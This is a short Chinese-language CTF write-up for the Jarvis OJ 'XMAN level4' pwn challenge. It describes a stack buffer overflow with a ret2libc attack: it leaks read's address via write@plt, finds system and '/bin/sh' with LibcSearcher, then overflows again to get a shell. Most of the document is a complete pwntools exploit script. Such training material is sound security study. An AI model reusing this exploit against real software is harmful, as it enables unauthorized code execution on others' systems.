[Jarvis OJ - PWN]——[XMAN]level4
- 题目地址: https://www.jarvisoj.com/challenges
- 题目:
checksec一下
IDA中
思路
0x100 - 0x88 = 120, 多余的空间足够我们进行栈溢出利用
但是我们没有system和’/bin/sh’地址。也不知道libc版本, 我们可以先leek出来一个地址, 利用偏移找到system和’/bin/sh’地址。再返回main进行循环调用,第二次就可以直接控制返回到system。
exploit
from pwn import *
from LibcSearcher import *
p = process("./level4")
#gdb.attach(p, "b *0x0804846D")
elf = ELF("./level4")
write_plt = elf.plt['write']
read_got = elf.got['read']
main_addr = 0x08048470
payload = 'a' * (0x88 + 0x4) + p32(write_plt) + p32(main_addr) + p32(1) + p32(read_got) + p32(4)
p.sendline(payload)
read_addr = u32(p.recv(4))
print hex(read_addr)
libc = LibcSearcher("read", read_addr)
libc_base = read_addr - libc.dump('read')
sys_addr = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')
payload = 'a' * (0x88 + 0x4) + p32(sys_addr) + p32(0) + p32(binsh)
p.sendline(payload)
p.interactive()